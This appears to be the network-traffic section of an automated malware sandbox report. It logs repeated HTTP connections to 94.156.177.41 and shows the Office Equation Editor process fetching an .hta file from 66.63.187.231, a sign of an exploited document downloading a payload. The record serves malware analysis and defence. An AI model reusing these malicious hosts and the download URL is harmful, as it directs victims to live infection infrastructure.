                                                    Nov 20, 2024 11:09:36.887836933 CET4924680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:36.896991968 CET804924694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:36.897068024 CET4924680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:36.898722887 CET4924680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:36.907443047 CET804924694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:36.907516003 CET4924680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:36.916390896 CET804924694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:37.665819883 CET804924694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:37.666071892 CET4924680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:37.667335033 CET804924694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:37.667412996 CET4924680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:37.673948050 CET804924694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:37.812587023 CET4924780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:37.819885015 CET804924794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:37.819981098 CET4924780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:37.822323084 CET4924780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:37.827261925 CET804924794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:37.827332020 CET4924780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:37.836492062 CET804924794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:38.569812059 CET804924794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:38.569861889 CET804924794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:38.569971085 CET4924780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:38.570019007 CET4924780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:38.574889898 CET804924794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:38.705238104 CET4924880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:38.710345030 CET804924894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:38.710433006 CET4924880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:38.712826967 CET4924880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:38.717725992 CET804924894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:38.717822075 CET4924880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:38.722712040 CET804924894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:39.499545097 CET804924894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:39.499572039 CET804924894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:39.499696016 CET4924880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:39.499773979 CET4924880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:39.504812002 CET804924894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:39.640361071 CET4924980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:39.645431042 CET804924994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:39.645543098 CET4924980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:39.647249937 CET4924980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:39.652201891 CET804924994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:39.652335882 CET4924980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:39.657464981 CET804924994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:40.469007015 CET804924994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:40.469093084 CET804924994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:40.469108105 CET804924994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:40.469130993 CET4924980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:40.469163895 CET4924980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:40.474030972 CET804924994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:40.597676039 CET4925080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:40.602725029 CET804925094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:40.602796078 CET4925080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:40.604469061 CET4925080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:40.609349966 CET804925094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:40.609402895 CET4925080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:40.614367008 CET804925094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:41.391279936 CET804925094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:41.391427994 CET804925094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:41.391468048 CET4925080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:41.391819954 CET4925080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:41.398932934 CET804925094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:41.537741899 CET4925180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:41.542603016 CET804925194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:41.542671919 CET4925180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:41.544437885 CET4925180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:41.549289942 CET804925194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:41.549340010 CET4925180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:41.554270983 CET804925194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:42.303117990 CET804925194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:42.303354025 CET4925180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:42.303493977 CET804925194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:42.303555012 CET4925180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:42.310054064 CET804925194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:42.453895092 CET4925280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:42.602610111 CET804925294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:42.602746964 CET4925280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:42.604454041 CET4925280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:42.611584902 CET804925294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:42.611715078 CET4925280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:42.618391991 CET804925294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:43.481375933 CET804925294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:43.481482983 CET804925294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:43.481518030 CET4925280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:43.481596947 CET4925280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:43.487716913 CET804925294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:43.620413065 CET4925380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:43.625374079 CET804925394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:43.625447035 CET4925380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:43.628057003 CET4925380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:43.638573885 CET804925394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:43.638685942 CET4925380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:43.643579006 CET804925394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:44.496330976 CET804925394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:44.496397972 CET804925394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:44.496460915 CET4925380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:44.506514072 CET4925380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:44.514313936 CET804925394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:44.659183025 CET4925480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:44.664280891 CET804925494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:44.664361000 CET4925480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:44.667074919 CET4925480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:44.671977997 CET804925494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:44.672058105 CET4925480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:44.676984072 CET804925494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:45.552701950 CET804925494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:45.552782059 CET804925494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:45.552872896 CET4925480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:45.560204029 CET804925494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:45.963196039 CET4925580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:45.969471931 CET804925594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:45.969562054 CET4925580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:45.972708941 CET4925580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:45.977726936 CET804925594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:45.977790117 CET4925580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:45.982737064 CET804925594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:46.836325884 CET804925594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:46.836458921 CET804925594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:46.836510897 CET4925580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:46.836540937 CET4925580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:46.843780041 CET804925594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:47.064491987 CET4925680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:47.069732904 CET804925694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:47.069793940 CET4925680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:47.071502924 CET4925680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:47.076365948 CET804925694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:47.076412916 CET4925680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:47.081290007 CET804925694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:47.805121899 CET804925694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:47.805176020 CET804925694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:47.805329084 CET4925680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:47.805546045 CET4925680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:47.813494921 CET804925694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:48.072324991 CET4925780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:48.077481031 CET804925794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:48.077574015 CET4925780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:48.079220057 CET4925780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:48.084136009 CET804925794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:48.084264040 CET4925780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:48.089194059 CET804925794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:48.830760956 CET804925794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:48.830987930 CET4925780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:48.831382990 CET804925794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:48.831446886 CET4925780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:48.835846901 CET804925794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:48.962769032 CET4925880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:48.969948053 CET804925894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:48.970026016 CET4925880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:48.971710920 CET4925880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:48.976560116 CET804925894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:48.976619959 CET4925880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:48.981450081 CET804925894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:49.845029116 CET804925894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:49.845185041 CET804925894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:49.845370054 CET4925880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:49.845676899 CET4925880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:49.850272894 CET804925894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:49.975398064 CET4925980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:49.984066010 CET804925994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:49.984149933 CET4925980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:49.985842943 CET4925980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:49.991019011 CET804925994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:49.991080999 CET4925980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:49.996485949 CET804925994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:50.739392042 CET804925994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:50.739411116 CET804925994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:50.739485025 CET4925980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:50.739485025 CET4925980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:50.744961023 CET804925994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:50.878643990 CET4926080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:50.886665106 CET804926094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:50.886739969 CET4926080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:50.888453960 CET4926080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:50.896085978 CET804926094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:50.896157980 CET4926080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:50.901020050 CET804926094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:51.764324903 CET804926094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:51.764360905 CET804926094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:51.764420986 CET4926080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:51.764451027 CET4926080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:51.771157980 CET804926094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:51.892802954 CET4926180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:51.899765968 CET804926194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:51.899868965 CET4926180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:51.901511908 CET4926180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:51.906440020 CET804926194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:51.906529903 CET4926180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:51.911711931 CET804926194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:52.644270897 CET804926194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:52.644423962 CET4926180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:52.645479918 CET804926194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:52.645536900 CET4926180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:52.649858952 CET804926194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:52.786588907 CET4926280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:53.797863960 CET804926294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:53.798048973 CET4926280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:53.839478970 CET4926280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:53.992160082 CET804926294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:53.992288113 CET4926280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:53.997164011 CET804926294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:54.860554934 CET804926294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:54.860848904 CET804926294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:54.860924959 CET4926280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:54.874110937 CET4926280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:54.882822037 CET804926294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:55.088159084 CET4926380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:55.205104113 CET804926394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:55.205218077 CET4926380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:55.232420921 CET4926380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:55.237579107 CET804926394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:55.237642050 CET4926380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:55.242727041 CET804926394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:56.162249088 CET804926394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:56.162266970 CET804926394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:56.162277937 CET804926394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:56.162434101 CET4926380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:56.162503004 CET4926380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:56.167363882 CET804926394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:56.292306900 CET4926480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:56.301135063 CET804926494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:56.301273108 CET4926480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:56.303037882 CET4926480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:56.311984062 CET804926494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:56.312045097 CET4926480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:56.322295904 CET804926494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:57.284970045 CET804926494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:57.284989119 CET804926494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:57.285140038 CET4926480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:57.285146952 CET804926494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:57.285187960 CET4926480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:57.288341999 CET4926480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:57.293292999 CET804926494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:57.417721033 CET4926580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:57.423409939 CET804926594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:57.423471928 CET4926580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:57.425153971 CET4926580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:57.430061102 CET804926594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:57.430145979 CET4926580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:57.435163021 CET804926594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:58.170331001 CET804926594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:58.170347929 CET804926594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:58.170473099 CET4926580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:58.176878929 CET4926580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:58.181716919 CET804926594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:58.385591030 CET4926680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:58.391064882 CET804926694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:58.391133070 CET4926680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:58.392790079 CET4926680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:58.397994995 CET804926694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:58.398091078 CET4926680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:58.403036118 CET804926694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:59.122375011 CET804926694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:59.122658014 CET4926680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:59.122677088 CET804926694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:59.122745991 CET4926680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:59.127573013 CET804926694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:59.650768042 CET4926780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:59.655683994 CET804926794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:59.655765057 CET4926780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:59.657531977 CET4926780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:59.662532091 CET804926794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:59.662600994 CET4926780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:59.667577982 CET804926794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:00.411623955 CET804926794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:00.411828041 CET4926780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:00.412177086 CET804926794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:00.412249088 CET4926780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:00.419064045 CET804926794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:00.550661087 CET4926880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:00.558024883 CET804926894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:00.558087111 CET4926880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:00.560472012 CET4926880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:00.565474987 CET804926894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:00.565537930 CET4926880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:00.570461988 CET804926894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:01.322582960 CET804926894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:01.322671890 CET804926894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:01.322716951 CET4926880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:01.322757006 CET4926880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:01.332375050 CET804926894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:01.461206913 CET4926980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:01.466331005 CET804926994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:01.466408014 CET4926980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:01.467992067 CET4926980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:01.472791910 CET804926994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:01.472851038 CET4926980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:01.477732897 CET804926994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:02.202414036 CET804926994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:02.202639103 CET4926980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:02.203061104 CET804926994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:02.203105927 CET4926980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:02.207700014 CET804926994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:02.329394102 CET4927080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:02.334358931 CET804927094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:02.334482908 CET4927080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:02.336374998 CET4927080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:02.341317892 CET804927094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:02.341418982 CET4927080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:02.346508980 CET804927094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:03.218589067 CET804927094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:03.219834089 CET804927094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:03.219949007 CET4927080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:03.230890989 CET4927080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:03.237103939 CET804927094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:03.565576077 CET4927180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:03.572508097 CET804927194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:03.572581053 CET4927180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:03.574256897 CET4927180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:03.579277992 CET804927194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:03.579344034 CET4927180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:03.584287882 CET804927194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:04.453927994 CET804927194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:04.454186916 CET4927180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:04.454412937 CET804927194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:04.454457998 CET4927180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:04.459383011 CET804927194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:04.601392984 CET4927280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:04.606396914 CET804927294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:04.606492996 CET4927280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:04.608426094 CET4927280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:04.613291979 CET804927294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:04.613404989 CET4927280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:04.618388891 CET804927294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:05.503791094 CET804927294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:05.503901958 CET4927280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:05.504331112 CET804927294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:05.504385948 CET4927280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:05.508922100 CET804927294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:05.641379118 CET4927380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:05.646807909 CET804927394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:05.646874905 CET4927380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:05.648680925 CET4927380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:05.653564930 CET804927394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:05.653629065 CET4927380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:05.658502102 CET804927394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:06.403878927 CET804927394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:06.403950930 CET804927394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:10:06.403991938 CET4927380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:06.438961029 CET4927380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:10:06.443859100 CET804927394.156.177.41192.168.2.22
                                                    • 66.63.187.231
                                                    • 94.156.177.41
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.224916366.63.187.231803276C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:00.375526905 CET363OUTGET /xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.hta HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
